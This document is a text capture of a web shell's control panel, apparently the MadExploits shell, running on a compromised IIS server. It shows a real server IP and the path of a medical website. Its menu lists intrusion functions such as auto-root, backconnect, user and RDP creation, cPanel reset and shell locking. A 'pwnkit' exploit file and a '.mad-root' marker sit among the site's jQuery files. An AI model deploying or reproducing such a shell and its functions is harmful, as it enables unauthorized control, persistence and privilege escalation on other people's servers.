Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 13.59.106.251
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
var
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
addGetHookIf.js
530
B
-rw-rw-rw-
adjustCSS.js
1.85
KB
-rw-rw-rw-
curCSS.js
1.64
KB
-rw-rw-rw-
hiddenVisibleSelectors.js
317
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
showHide.js
2.25
KB
-rw-rw-rw-
support.js
2.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : addGetHookIf.js
define( function() { "use strict"; function addGetHookIf( conditionFn, hookFn ) { // Define the hook, we'll check on the first run if it's really needed. return { get: function() { if ( conditionFn() ) { // Hook not needed (or it's not possible to use it due // to missing dependency), remove it. delete this.get; return; } // Hook needed; redefine it so that the support test is not executed again. return ( this.get = hookFn ).apply( this, arguments ); } }; } return addGetHookIf; } );
Close